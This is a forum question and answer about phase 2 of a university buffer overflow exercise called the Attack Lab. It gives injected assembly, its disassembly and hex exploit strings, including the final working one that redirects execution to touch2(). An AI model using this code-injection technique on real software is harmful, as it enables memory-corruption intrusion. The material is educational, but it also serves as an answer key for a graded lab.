I have a buffer overflow lab I have to do for a project called The Attack Lab. I'm on phase 2 of the lab, and I have to inject code as part of my exploit string in order to make the program point to the address of the function touch2(). I've gotten the correct exploit code I need (confirmed with TA):
movq $0x4ed659a2,$rdi pushq $0x4018c3 //address of touch2 ret I compiled and disassemble this code:
Disassembly of section .text:
0: 48 c7 c7 a2 59 d6 4e mov $0x4ed659a2,%rdi 7: 68 c3 18 40 00 pushq $0x4018c3 c: c3 retq I want to find the correct exploit string to pass into the program? The address of %rsp is 0x5560a188.
My TA said the comment of this discussion is correct so I tried this exploit string
48 c7 c7 a2 59 d6 4e 00 68 c3 18 40 00 00 00 00 c3 00 00 00 00 00 00 00 88 a1 60 55 00 00 00 00 but this is incorrect. It did not even reach touch2.
Before that, I worked on the solution like this:
48 c7 c7 a2 59 d6 4e c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 a1 60 55 00 00 00 00 c3 18 40 00 00 00 00 00 for
0: 48 c7 c7 a2 59 d6 4e mov $0x4ed659a2,%rdi 7: c3 retq and got a segfault.
I disassembled rtarget here. ctarget and rtarget behave the same.
Thanks.
111 Answer
I have asked my professor and got the solution.
Initially, my incorrect exploit string was
48 c7 c7 a2 59 d6 4e 00 68 c3 18 40 00 00 00 00 c3 00 00 00 00 00 00 00 88 a1 60 55 00 00 00 00 However, my prof told me NOT to add any extra bytes between the instructions. So I tried
48 c7 c7 a2 59 d6 4e 68 c3 18 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 88 a1 60 55 00 00 00 00 and it works!
Thus, we just need to make sure that all bytes of the instructions are together with no padding between, and don't mess up the order of instruction in term of bytes!
1